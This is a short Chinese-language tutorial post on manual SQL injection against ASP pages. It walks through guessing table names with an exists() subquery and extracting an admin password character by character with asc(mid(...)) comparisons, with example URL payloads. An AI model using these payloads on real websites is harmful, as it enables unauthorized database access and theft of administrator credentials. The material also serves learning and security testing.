SQL手工注入---表的猜解
阿新 • • 發佈:2019-02-04
手工注入過程
找到注入點→表名→列名→列長度→列值
猜解表名
http://www.xxx.com/index.asp?id=1 and exists(select * from 猜測的表名)
exists子查詢的功能是判斷子查詢的返回結果中是否有資料行。
TOP n :子句用於規定要返回的記錄的數目。
len(列名) : 函式返回某列欄位中值的長度。
猜解列值
http://www.xxx.com/index.asp?id=1 and (select top 1 asc(mid(列名,列數,n)) from admin)> 猜測的ascll碼 如97
http://www.xxx.com/index.asp?id=1
例如 :http://www.xxx.com/index.asp?id=1 and (select top 1 asc(mid(password,1,1)) from admin)>97
asc( ) : 將字元轉換為ascll碼
mid(列名,開始的列數,擷取的個數) : 截取出所需要的字元